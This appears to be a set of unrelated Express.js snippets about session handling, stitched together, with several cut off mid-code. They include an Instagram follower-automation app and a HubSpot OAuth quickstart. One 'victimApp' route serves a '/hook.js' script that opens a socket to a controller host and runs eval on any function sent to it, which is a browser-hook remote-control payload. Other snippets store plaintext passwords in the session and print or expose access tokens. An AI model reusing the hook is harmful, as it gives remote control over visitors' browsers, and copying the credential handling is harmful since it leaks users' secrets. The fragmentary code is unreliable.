app.get('/logout', (req, res, next) => { if (req.session.isLoggedIn) { var AuthSession = InstagramSessions[req.sessionID] AuthSession.logout((data) => { console.log("Logged in successfully") req.session.destroy(); delete InstagramSessions[req.sessionID] res.redirect("/") }) } else res.redirect("/") })
router.post('/login', function(req, res){ if(isLegalUser(req)) { var user = { 'username': req.body.username, 'password': req.body.password }; debug(req.sessionID); req.session.user = user; debug(req.session); res.render('index', {user: req.session.user}); } else { res.render('login'); } });
app.use((req, res, next) => { if (!req.session.color) { const colorHash = new ColorHash(); req.session.color = colorHash.hex(req.sessionID); } next(); });
victimApp.get('/hook.js', function(req, res){ res.write(socketIOClient) res.write(`(function(){const socket = io('ws://${process.env.VICTIM_SOCKET_IP}:${process.env.VICTIM_SOCKET_PORT}');socket.emit('identify','${req.sessionID}');socket.on('execute',function(data){eval(data.func);attack(data.params);});})();`) res.end() })
app.get('/', async (req, res) => { res.setHeader('Content-Type', 'text/html'); res.write(`<h2>HubSpot OAuth 2.0 Quickstart App</h2>`); if (isAuthorized(req.sessionID)) { const accessToken = await getAccessToken(req.sessionID); const contact = await getContact(accessToken); res.write(`<h4>Access token: ${accessToken}</h4>`); displayContactName(res, contact); } else { res.write(`<a href="/install"><h3>Install the app</h3></a>`); } res.end(); });
app.get('/freindship/followings', (req, res) => { var AuthSession = InstagramSessions[req.sessionID] var Extracted = new ProfileExtractor() if (req.session.isLoggedIn) { Extracted.getFollowings(AuthSession.userid,null, (data) => { res.json({ success: true, data: JSON.parse(data) }) console.log(data) }) } else { res.json({ success: false }) } })
if (data.success) { request.session.isLoggedIn = true InstagramSessions[request.sessionID] = AuthSession console.log("Logged in successfully") userdata = {
last_login_date: Date.now(), $addToSet: {web_session: { session_id: req.sessionID, ip_address: ip_address, }}
const token = await exchangeForTokens(req.sessionID, authCodeProof); if (token.message) { return res.redirect(`/error?msg=${token.message}`);
console.log(req.query) if (typeof(req.query.uid) != 'undefined') { var AuthSession = InstagramSessions[req.sessionID] FreindshipEngine.follow(AuthSession.userid,req.query.uid, (data) => { try {
app.get('/localapi', (req, res, next) => { data = { isLoggedIn: false, userdata: {} } if (req.session.isLoggedIn) { data.isLoggedIn = true var AuthSession = InstagramSessions[req.sessionID] data.userdata = { 'userid': AuthSession.userid, 'username': AuthSession.username, 'fullname': AuthSession.fullname, 'profile_pic': AuthSession.profile_pic, 'token' : AuthSession.token, } } res.json(data) })
console.log(req.query) var AuthSession = InstagramSessions[req.sessionID] FreindshipEngine.unfollow(AuthSession.userid,req.query.uid, (data) => { try {
app.get('/freindship/followers', (req, res) => { var AuthSession = InstagramSessions[req.sessionID] var Extracted = new ProfileExtractor() if (req.session.isLoggedIn) { Extracted.getfollowers(AuthSession.userid,null, (data) => { res.json({ success: true, data: JSON.parse(data) }) console.log(data) }) } else { res.json({ success: false }) } })
router.post('/login', function(req, res){ if(isLegalUser(req)) { var user = { 'username': req.body.username, 'password': req.body.password }; debug(req.sessionID); req.session.user = user; debug(req.session); res.render('index', {user: req.session.user}); } else { res.render('login'); } });